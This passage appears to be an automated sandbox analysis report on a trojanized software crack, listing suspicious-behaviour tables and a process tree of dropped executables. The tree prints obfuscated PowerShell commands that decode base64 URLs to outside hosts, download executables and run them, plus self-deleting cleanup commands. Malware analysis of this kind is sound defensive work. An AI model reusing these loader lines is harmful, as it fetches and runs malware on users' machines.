File opened for modification	C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe:150EFC68	explorer.exe
File created	C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe:150EFC68	explorer.exe

Runs regedit.exe 1 IoCs

pid	Process
4804	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
3140	data.dat
3140	data.dat
3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1428	dw20.exe
1428	dw20.exe
1288	explorer.exe
1288	explorer.exe
4464	powershell.exe
4464	powershell.exe
556	powershell.exe
556	powershell.exe
556	powershell.exe
4464	powershell.exe
5112	powershell.exe
5112	powershell.exe
4464	powershell.exe
3272	powershell.exe
3272	powershell.exe
556	powershell.exe
5112	powershell.exe
3272	powershell.exe
5112	powershell.exe
3272	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4668	powershell.exe
4668	powershell.exe
4668	powershell.exe
4668	powershell.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
4244	hGSBLC0mMB.exe
4244	hGSBLC0mMB.exe
4660	BKqzN9zoCZ.exe
4660	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe

Suspicious behavior: MapViewOfSection 31 IoCs

pid	Process
652	bb.exe
652	bb.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
5096	ejf.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1796	FGbfttrev.exe
4240	FDvbcgfert.exe
1288	explorer.exe
4468	9119gy3q5_1.exe
4468	9119gy3q5_1.exe
1288	explorer.exe
1288	explorer.exe
5252	333u357995k.exe
5404	FDvbcgfert.exe
5888	FGbfttrev.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
Token: SeIncreaseQuotaPrivilege	3948	wmic.exe
Token: SeSecurityPrivilege	3948	wmic.exe
Token: SeTakeOwnershipPrivilege	3948	wmic.exe
Token: SeLoadDriverPrivilege	3948	wmic.exe
Token: SeSystemProfilePrivilege	3948	wmic.exe
Token: SeSystemtimePrivilege	3948	wmic.exe
Token: SeProfSingleProcessPrivilege	3948	wmic.exe
Token: SeIncBasePriorityPrivilege	3948	wmic.exe
Token: SeCreatePagefilePrivilege	3948	wmic.exe
Token: SeBackupPrivilege	3948	wmic.exe
Token: SeRestorePrivilege	3948	wmic.exe
Token: SeShutdownPrivilege	3948	wmic.exe
Token: SeDebugPrivilege	3948	wmic.exe
Token: SeSystemEnvironmentPrivilege	3948	wmic.exe
Token: SeRemoteShutdownPrivilege	3948	wmic.exe
Token: SeUndockPrivilege	3948	wmic.exe
Token: SeManageVolumePrivilege	3948	wmic.exe
Token: 33	3948	wmic.exe
Token: 34	3948	wmic.exe
Token: 35	3948	wmic.exe
Token: 36	3948	wmic.exe
Token: SeIncreaseQuotaPrivilege	3948	wmic.exe
Token: SeSecurityPrivilege	3948	wmic.exe
Token: SeTakeOwnershipPrivilege	3948	wmic.exe
Token: SeLoadDriverPrivilege	3948	wmic.exe
Token: SeSystemProfilePrivilege	3948	wmic.exe
Token: SeSystemtimePrivilege	3948	wmic.exe
Token: SeProfSingleProcessPrivilege	3948	wmic.exe
Token: SeIncBasePriorityPrivilege	3948	wmic.exe
Token: SeCreatePagefilePrivilege	3948	wmic.exe
Token: SeBackupPrivilege	3948	wmic.exe
Token: SeRestorePrivilege	3948	wmic.exe
Token: SeShutdownPrivilege	3948	wmic.exe
Token: SeDebugPrivilege	3948	wmic.exe
Token: SeSystemEnvironmentPrivilege	3948	wmic.exe
Token: SeRemoteShutdownPrivilege	3948	wmic.exe
Token: SeUndockPrivilege	3948	wmic.exe
Token: SeManageVolumePrivilege	3948	wmic.exe
Token: 33	3948	wmic.exe
Token: 34	3948	wmic.exe
Token: 35	3948	wmic.exe
Token: 36	3948	wmic.exe
Token: SeDebugPrivilege	652	bb.exe
Token: SeRestorePrivilege	652	bb.exe
Token: SeBackupPrivilege	652	bb.exe
Token: SeLoadDriverPrivilege	652	bb.exe
Token: SeCreatePagefilePrivilege	652	bb.exe
Token: SeShutdownPrivilege	652	bb.exe
Token: SeTakeOwnershipPrivilege	652	bb.exe
Token: SeChangeNotifyPrivilege	652	bb.exe
Token: SeCreateTokenPrivilege	652	bb.exe
Token: SeMachineAccountPrivilege	652	bb.exe
Token: SeSecurityPrivilege	652	bb.exe
Token: SeAssignPrimaryTokenPrivilege	652	bb.exe
Token: SeCreateGlobalPrivilege	652	bb.exe
Token: 33	652	bb.exe
Token: SeDebugPrivilege	1288	explorer.exe
Token: SeRestorePrivilege	1288	explorer.exe
Token: SeBackupPrivilege	1288	explorer.exe
Token: SeLoadDriverPrivilege	1288	explorer.exe
Token: SeCreatePagefilePrivilege	1288	explorer.exe
Token: SeShutdownPrivilege	1288	explorer.exe
Token: SeTakeOwnershipPrivilege	1288	explorer.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
3140	data.dat
3684	Keygen.exe
5096	ejf.exe
1796	FGbfttrev.exe
4240	FDvbcgfert.exe
2012	abx.exe
496	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
5252	333u357995k.exe
5888	FGbfttrev.exe
5404	FDvbcgfert.exe
5660	fYDz9wNnYe.exe
5660	fYDz9wNnYe.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4716 wrote to memory of 1008	4716	amtemu.v0.9.2.win-painter_edited.exe	74
PID 4716 wrote to memory of 1008	4716	amtemu.v0.9.2.win-painter_edited.exe	74
PID 4716 wrote to memory of 1008	4716	amtemu.v0.9.2.win-painter_edited.exe	74
PID 1008 wrote to memory of 3604	1008	cmd.exe	77
PID 1008 wrote to memory of 3604	1008	cmd.exe	77
PID 1008 wrote to memory of 3604	1008	cmd.exe	77
PID 1008 wrote to memory of 2776	1008	cmd.exe	79
PID 1008 wrote to memory of 2776	1008	cmd.exe	79
PID 1008 wrote to memory of 2776	1008	cmd.exe	79
PID 3604 wrote to memory of 4172	3604	key.exe	80
PID 3604 wrote to memory of 4172	3604	key.exe	80
PID 3604 wrote to memory of 4172	3604	key.exe	80
PID 1008 wrote to memory of 3212	1008	cmd.exe	82
PID 1008 wrote to memory of 3212	1008	cmd.exe	82
PID 1008 wrote to memory of 3212	1008	cmd.exe	82
PID 4172 wrote to memory of 4072	4172	cmd.exe	83
PID 4172 wrote to memory of 4072	4172	cmd.exe	83
PID 4172 wrote to memory of 4072	4172	cmd.exe	83
PID 1008 wrote to memory of 3460	1008	cmd.exe	84
PID 1008 wrote to memory of 3460	1008	cmd.exe	84
PID 1008 wrote to memory of 3460	1008	cmd.exe	84
PID 4172 wrote to memory of 3176	4172	cmd.exe	85
PID 4172 wrote to memory of 3176	4172	cmd.exe	85
PID 4172 wrote to memory of 3176	4172	cmd.exe	85
PID 4172 wrote to memory of 4084	4172	cmd.exe	86
PID 4172 wrote to memory of 4084	4172	cmd.exe	86
PID 4172 wrote to memory of 4084	4172	cmd.exe	86
PID 4172 wrote to memory of 3140	4172	cmd.exe	87
PID 4172 wrote to memory of 3140	4172	cmd.exe	87
PID 4172 wrote to memory of 3140	4172	cmd.exe	87
PID 3212 wrote to memory of 3948	3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe	88
PID 3212 wrote to memory of 3948	3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe	88
PID 3212 wrote to memory of 3948	3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe	88
PID 1008 wrote to memory of 4472	1008	cmd.exe	91
PID 1008 wrote to memory of 4472	1008	cmd.exe	91
PID 1008 wrote to memory of 4472	1008	cmd.exe	91
PID 4472 wrote to memory of 652	4472	bb.exe	92
PID 4472 wrote to memory of 652	4472	bb.exe	92
PID 4472 wrote to memory of 652	4472	bb.exe	92
PID 4472 wrote to memory of 652	4472	bb.exe	92
PID 4472 wrote to memory of 652	4472	bb.exe	92
PID 1008 wrote to memory of 980	1008	cmd.exe	93
PID 1008 wrote to memory of 980	1008	cmd.exe	93
PID 1008 wrote to memory of 980	1008	cmd.exe	93
PID 652 wrote to memory of 1288	652	bb.exe	94
PID 652 wrote to memory of 1288	652	bb.exe	94
PID 652 wrote to memory of 1288	652	bb.exe	94
PID 1008 wrote to memory of 1780	1008	cmd.exe	95
PID 1008 wrote to memory of 1780	1008	cmd.exe	95
PID 1008 wrote to memory of 1780	1008	cmd.exe	95
PID 1008 wrote to memory of 1948	1008	cmd.exe	96
PID 1008 wrote to memory of 1948	1008	cmd.exe	96
PID 1008 wrote to memory of 1948	1008	cmd.exe	96
PID 1288 wrote to memory of 4716	1288	explorer.exe	67
PID 1288 wrote to memory of 4716	1288	explorer.exe	67
PID 1288 wrote to memory of 1008	1288	explorer.exe	74
PID 1288 wrote to memory of 1008	1288	explorer.exe	74
PID 1288 wrote to memory of 3604	1288	explorer.exe	77
PID 1288 wrote to memory of 3604	1288	explorer.exe	77
PID 1288 wrote to memory of 4172	1288	explorer.exe	80
PID 1288 wrote to memory of 4172	1288	explorer.exe	80
PID 1288 wrote to memory of 3140	1288	explorer.exe	87
PID 1288 wrote to memory of 3140	1288	explorer.exe	87
PID 1288 wrote to memory of 1780	1288	explorer.exe	95

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4072	attrib.exe

C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe
"C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6D65.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"
  2⤵
  - Checks whether UAC is enabled
  - Maps connected drives based on registry
  - Suspicious use of WriteProcessMemory
  PID:1008
- - C:\Users\Admin\AppData\Local\Temp\6D65.tmp\key.exe
    key.exe
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    PID:3604
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t4402.bat" "C:\Users\Admin\AppData\Local\Temp\6D65.tmp\key.exe" "
      4⤵
      Drops file in Drivers directory
      Checks whether UAC is enabled
      Maps connected drives based on registry
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:4172
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
        5⤵
        Views/modifies file attributes
        
        PID:4072
    - - C:\Windows\SysWOW64\find.exe
        
        FIND /C /I "0.0.0.0 cracksmind.com" C:\Windows\system32\drivers\etc\hosts
        5⤵
        
        PID:3176
    - - C:\Windows\SysWOW64\find.exe
        
        FIND /C /I "0.0.0.0 www.cracksmind.com" C:\Windows\system32\drivers\etc\hosts
        5⤵
        
        PID:4084
    - - C:\Users\Admin\AppData\Local\Temp\afolder\data.dat
        
        C:\Users\Admin\AppData\Local\Temp\afolder/data.dat
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3140
- - C:\Windows\SysWOW64\timeout.exe
    TIMEOUT /T 1
    3⤵
    - Delays execution with timeout.exe
    PID:2776
- - C:\Users\Admin\AppData\Local\Temp\6D65.tmp\Microsoft.VisualStudio.Package.LanguageService.11.0.exe
    Microsoft.VisualStudio.Package.LanguageService.11.0.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3212
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic" os get Caption /format:list
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3948
- - C:\Windows\SysWOW64\timeout.exe
    TIMEOUT /T 2
    3⤵
    - Delays execution with timeout.exe
    PID:3460
- - C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exe
    bb.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4472
  - - C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exe
      "C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Checks processor information in registry
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:652
    - - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        5⤵
        Modifies firewall policy service
        Checks BIOS information in registry
        Adds Run key to start application
        Drops desktop.ini file(s)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Checks processor information in registry
        Enumerates system info in registry
        Modifies Internet Explorer Protected Mode
        Modifies Internet Explorer Protected Mode Banner
        Modifies Internet Explorer settings
        NTFS ADS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1288
      - C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe
        
        /suac
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe"
        7⤵
        Modifies firewall policy service
        Executes dropped EXE
        Checks for any installed AV software in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Checks processor information in registry
        Suspicious behavior: MapViewOfSection
        
        PID:4468
        
        C:\Windows\SysWOW64\regedit.exe
        
        "C:\Windows\SysWOW64\regedit.exe"
        8⤵
        Modifies security service
        Adds Run key to start application
        Modifies Internet Explorer settings
        Runs regedit.exe
        
        PID:4804
      - C:\Users\Admin\AppData\Local\Temp\i533usso357o795.exe
        
        "C:\Users\Admin\AppData\Local\Temp\i533usso357o795.exe"
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4572
      - C:\Users\Admin\AppData\Local\Temp\333u357995k.exe
        
        "C:\Users\Admin\AppData\Local\Temp\333u357995k.exe"
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:5888
        
        C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
        8⤵
        Executes dropped EXE
        
        PID:4624
        
        C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:5404
        
        C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:5284
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 5284 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\778415280088976\\* & exit
        9⤵
        
        PID:4788
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 5284
        10⤵
        Kills process with taskkill
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\333u357995k.exe
        
        "C:\Users\Admin\AppData\Local\Temp\333u357995k.exe"
        7⤵
        Executes dropped EXE
        
        PID:3960
- - C:\Windows\SysWOW64\timeout.exe
    TIMEOUT /T 3
    3⤵
    - Delays execution with timeout.exe
    PID:980
- - C:\Users\Admin\AppData\Local\Temp\6D65.tmp\puttty.exe
    puttty.exe
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1780
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 1532
      4⤵
      Maps connected drives based on registry
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:1428
- - C:\Windows\SysWOW64\timeout.exe
    TIMEOUT /T 4
    3⤵
    - Delays execution with timeout.exe
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\6D65.tmp\ereds.exe
    ereds.exe
    3⤵
    - Executes dropped EXE
    PID:928
  - - C:\Users\Admin\AppData\Local\Temp\keygen.exe
      "C:\Users\Admin\AppData\Local\Temp\keygen.exe"
      4⤵
      PID:4724
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\keygen.exe"
        5⤵
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Modifies registry class
        
        PID:5044
      - C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\Keygen.exe
        
        Keygen.exe
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:3684
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        Checks whether UAC is enabled
        
        PID:4020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Blocklisted process makes network request
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:4464
        
        C:\Users\Public\abx.exe
        
        "C:\Users\Public\abx.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2012
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        Checks whether UAC is enabled
        Maps connected drives based on registry
        
        PID:4300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:556
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        6⤵
        Delays execution with timeout.exe
        
        PID:4092
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:5112
        
        C:\Users\Public\nqu.exe
        
        "C:\Users\Public\nqu.exe"
        8⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3620
        
        C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
        
        "{path}"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:1336
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 1336 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\337278076516208\\* & exit
        12⤵
        
        PID:6636
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 1336
        13⤵
        Kills process with taskkill
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
        
        "{path}"
        10⤵
        Executes dropped EXE
        
        PID:1404
        
        C:\Users\Public\nqu.exe
        
        "{path}"
        9⤵
        Executes dropped EXE
        
        PID:5472
        
        C:\Users\Public\nqu.exe
        
        "{path}"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops desktop.ini file(s)
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5484
        
        C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe"
        11⤵
        Executes dropped EXE
        
        PID:5456
        
        C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe"
        11⤵
        Executes dropped EXE
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\QufVBH3jUE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QufVBH3jUE.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4828
        
        C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        11⤵
        
        PID:7132
        
        C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exe
        
